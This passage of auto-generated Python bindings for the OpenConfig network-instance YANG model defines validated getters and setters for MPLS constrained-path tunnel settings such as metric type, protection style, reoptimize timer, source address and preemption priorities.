"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"), is_leaf=True, yang_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__metric_type = t
if hasattr(self, "_set"):
self._set()
def _unset_metric_type(self):
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_metric(self):
"""
Getter method for metric, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric (int32)
YANG Description: The value of the metric that should be specified. The value
supplied in this leaf is used in conjunction with the metric
type to determine the value of the metric used by the system.
Where the metric-type is set to LSP_METRIC_ABSOLUTE - the
value of this leaf is used directly; where it is set to
LSP_METRIC_RELATIVE, the relevant (positive or negative)
offset is used to formulate the metric; where metric-type
is LSP_METRIC_INHERITED, the value of this leaf is not
utilised
"""
return self.__metric
def _set_metric(self, v, load=False):
"""
Setter method for metric, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric (int32)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric() directly.
YANG Description: The value of the metric that should be specified. The value
supplied in this leaf is used in conjunction with the metric
type to determine the value of the metric used by the system.
Where the metric-type is set to LSP_METRIC_ABSOLUTE - the
value of this leaf is used directly; where it is set to
LSP_METRIC_RELATIVE, the relevant (positive or negative)
offset is used to formulate the metric; where metric-type
is LSP_METRIC_INHERITED, the value of this leaf is not
utilised
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["-2147483648..2147483647"]},
int_size=32,
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="int32",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric must be of a type compatible with int32""",
"defined-type": "int32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['-2147483648..2147483647']}, int_size=32), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='int32', is_config=True)""",
}
)
self.__metric = t
if hasattr(self, "_set"):
self._set()
def _unset_metric(self):
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["-2147483648..2147483647"]},
int_size=32,
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="int32",
is_config=True,
)
def _get_shortcut_eligible(self):
"""
Getter method for shortcut_eligible, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/shortcut_eligible (boolean)
YANG Description: Whether this LSP is considered to be eligible for use as a
shortcut in the IGP. In the case that this leaf is set to
true, the IGP SPF calculation uses the metric specified to
determine whether traffic should be carried over this LSP
"""
return self.__shortcut_eligible
def _set_shortcut_eligible(self, v, load=False):
"""
Setter method for shortcut_eligible, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/shortcut_eligible (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_shortcut_eligible is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_shortcut_eligible() directly.
YANG Description: Whether this LSP is considered to be eligible for use as a
shortcut in the IGP. In the case that this leaf is set to
true, the IGP SPF calculation uses the metric specified to
determine whether traffic should be carried over this LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="shortcut-eligible",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """shortcut_eligible must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("true"), is_leaf=True, yang_name="shortcut-eligible", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__shortcut_eligible = t
if hasattr(self, "_set"):
self._set()
def _unset_shortcut_eligible(self):
self.__shortcut_eligible = YANGDynClass(
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="shortcut-eligible",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
def _get_protection_style_requested(self):
"""
Getter method for protection_style_requested, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/protection_style_requested (identityref)
YANG Description: style of mpls frr protection desired: can be
link, link-node or unprotected.
"""
return self.__protection_style_requested
def _set_protection_style_requested(self, v, load=False):
"""
Setter method for protection_style_requested, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/protection_style_requested (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_protection_style_requested is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_protection_style_requested() directly.
YANG Description: style of mpls frr protection desired: can be
link, link-node or unprotected.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:UNPROTECTED"),
is_leaf=True,
yang_name="protection-style-requested",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """protection_style_requested must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), default=six.text_type("oc-mplst:UNPROTECTED"), is_leaf=True, yang_name="protection-style-requested", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__protection_style_requested = t
if hasattr(self, "_set"):
self._set()
def _unset_protection_style_requested(self):
self.__protection_style_requested = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:UNPROTECTED"),
is_leaf=True,
yang_name="protection-style-requested",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_reoptimize_timer(self):
"""
Getter method for reoptimize_timer, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/reoptimize_timer (uint16)
YANG Description: frequency of reoptimization of
a traffic engineered LSP
"""
return self.__reoptimize_timer
def _set_reoptimize_timer(self, v, load=False):
"""
Setter method for reoptimize_timer, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/reoptimize_timer (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_reoptimize_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_reoptimize_timer() directly.
YANG Description: frequency of reoptimization of
a traffic engineered LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="reoptimize-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """reoptimize_timer must be of a type compatible with uint16""",
"defined-type": "uint16",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint16', is_config=True)""",
}
)
self.__reoptimize_timer = t
if hasattr(self, "_set"):
self._set()
def _unset_reoptimize_timer(self):
self.__reoptimize_timer = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="reoptimize-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
def _get_source(self):
"""
Getter method for source, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/source (inet:ip-address)
YANG Description: RSVP-TE tunnel source address
"""
return self.__source
def _set_source(self, v, load=False):
"""
Setter method for source, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/source (inet:ip-address)
If this variable is read-only (config: false) in the
source YANG file, then _set_source is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_source() directly.
YANG Description: RSVP-TE tunnel source address
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=[
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
],
is_leaf=True,
yang_name="source",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """source must be of a type compatible with inet:ip-address""",
"defined-type": "inet:ip-address",
"generated-type": """YANGDynClass(base=[RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}),RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}),], is_leaf=True, yang_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ip-address', is_config=True)""",
}
)
self.__source = t
if hasattr(self, "_set"):
self._set()
def _unset_source(self):
self.__source = YANGDynClass(
base=[
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
],
is_leaf=True,
yang_name="source",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address",
is_config=True,
)
def _get_soft_preemption(self):
"""
Getter method for soft_preemption, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/soft_preemption (boolean)
YANG Description: Enables RSVP soft-preemption on this LSP
"""
return self.__soft_preemption
def _set_soft_preemption(self, v, load=False):
"""
Setter method for soft_preemption, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/soft_preemption (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_soft_preemption is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_soft_preemption() directly.
YANG Description: Enables RSVP soft-preemption on this LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="soft-preemption",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """soft_preemption must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__soft_preemption = t
if hasattr(self, "_set"):
self._set()
def _unset_soft_preemption(self):
self.__soft_preemption = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="soft-preemption",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
def _get_setup_priority(self):
"""
Getter method for setup_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/setup_priority (uint8)
YANG Description: RSVP-TE preemption priority during LSP setup, lower is
higher priority; default 7 indicates that LSP will not
preempt established LSPs during setup
"""
return self.__setup_priority
def _set_setup_priority(self, v, load=False):
"""
Setter method for setup_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/setup_priority (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_setup_priority is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_setup_priority() directly.
YANG Description: RSVP-TE preemption priority during LSP setup, lower is
higher priority; default 7 indicates that LSP will not
preempt established LSPs during setup
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
7
),
is_leaf=True,
yang_name="setup-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """setup_priority must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..7']}), default=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8)(7), is_leaf=True, yang_name="setup-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=True)""",
}
)
self.__setup_priority = t
if hasattr(self, "_set"):
self._set()
def _unset_setup_priority(self):
self.__setup_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
7
),
is_leaf=True,
yang_name="setup-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
def _get_hold_priority(self):
"""
Getter method for hold_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/hold_priority (uint8)
YANG Description: preemption priority once the LSP is established,
lower is higher priority; default 0 indicates other LSPs
will not preempt the LSPs once established
"""
return self.__hold_priority
def _set_hold_priority(self, v, load=False):
"""
Setter method for hold_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/hold_priority (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_hold_priority is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_hold_priority() directly.
YANG Description: preemption priority once the LSP is established,
lower is higher priority; default 0 indicates other LSPs
will not preempt the LSPs once established
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
0
),
is_leaf=True,
yang_name="hold-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """hold_priority must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..7']}), default=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8)(0), is_leaf=True, yang_name="hold-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=True)""",
}
)
self.__hold_priority = t
if hasattr(self, "_set"):
self._set()
def _unset_hold_priority(self):
self.__hold_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
0
),
is_leaf=True,
yang_name="hold-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
name = __builtin__.property(_get_name, _set_name)
type = __builtin__.property(_get_type, _set_type)
signaling_protocol = __builtin__.property(
_get_signaling_protocol, _set_signaling_protocol
)
description = __builtin__.property(_get_description, _set_description)
admin_status = __builtin__.property(_get_admin_status, _set_admin_status)
preference = __builtin__.property(_get_preference, _set_preference)
metric_type = __builtin__.property(_get_metric_type, _set_metric_type)
metric = __builtin__.property(_get_metric, _set_metric)
shortcut_eligible = __builtin__.property(
_get_shortcut_eligible, _set_shortcut_eligible
)
protection_style_requested = __builtin__.property(
_get_protection_style_requested, _set_protection_style_requested
)
reoptimize_timer = __builtin__.property(
_get_reoptimize_timer, _set_reoptimize_timer
)
source = __builtin__.property(_get_source, _set_source)
soft_preemption = __builtin__.property(_get_soft_preemption, _set_soft_preemption)
